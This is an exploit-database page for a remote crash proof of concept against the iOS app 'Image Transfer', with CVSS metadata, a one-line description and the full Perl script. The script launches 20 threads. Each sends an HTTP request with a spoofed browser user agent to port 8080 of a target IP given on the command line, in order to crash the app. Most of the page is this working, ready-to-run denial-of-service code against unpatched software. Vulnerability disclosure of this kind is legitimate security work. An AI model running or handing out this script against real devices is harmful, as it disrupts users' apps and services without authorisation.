header-logo
Suggest Exploit
vendor:
Image Transfer IOS
by:
Mohammad Reza Espargham
7.5
CVSS
HIGH
Remote Crash
CWE
Product Name: Image Transfer IOS
Affected Version From: All Version
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Image Transfer IOS – Remote Crash Proof Of Concept

The script causes a denial of service (DoS) by sending multiple requests to the target host. It exploits a vulnerability in the Image Transfer IOS application.

Mitigation:

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Title : Image Transfer IOS - Remote Crash Proof Of Concept
# Affected Versions: All Version
# Tested on IOS 8.4 (12h143) / 2.0
# Itunes link : https://itunes.apple.com/us/app/image-transfer-photo-video/id588696602?mt=8
#
# EDB note: Might require to be run multiple times to cause DoS
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#


system(($^O eq 'MSWin32') ? 'cls' : 'clear');

use threads;
use LWP::UserAgent;


print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";


$port=8080; #port
$host=$ARGV[0]; #host


sub check_app {   #thread sub
        my $ua = LWP::UserAgent->new();
        $ua = new LWP::UserAgent(agent => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5");
        $ua -> timeout(10);
        print "*";
        $ua->get("http://$host:$port/?__debugger__=yes&cmd=resource&f=debugger.js");
        return 0;
}

my @threads;
for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
}
foreach (@threads) { #join
    $_->join();
}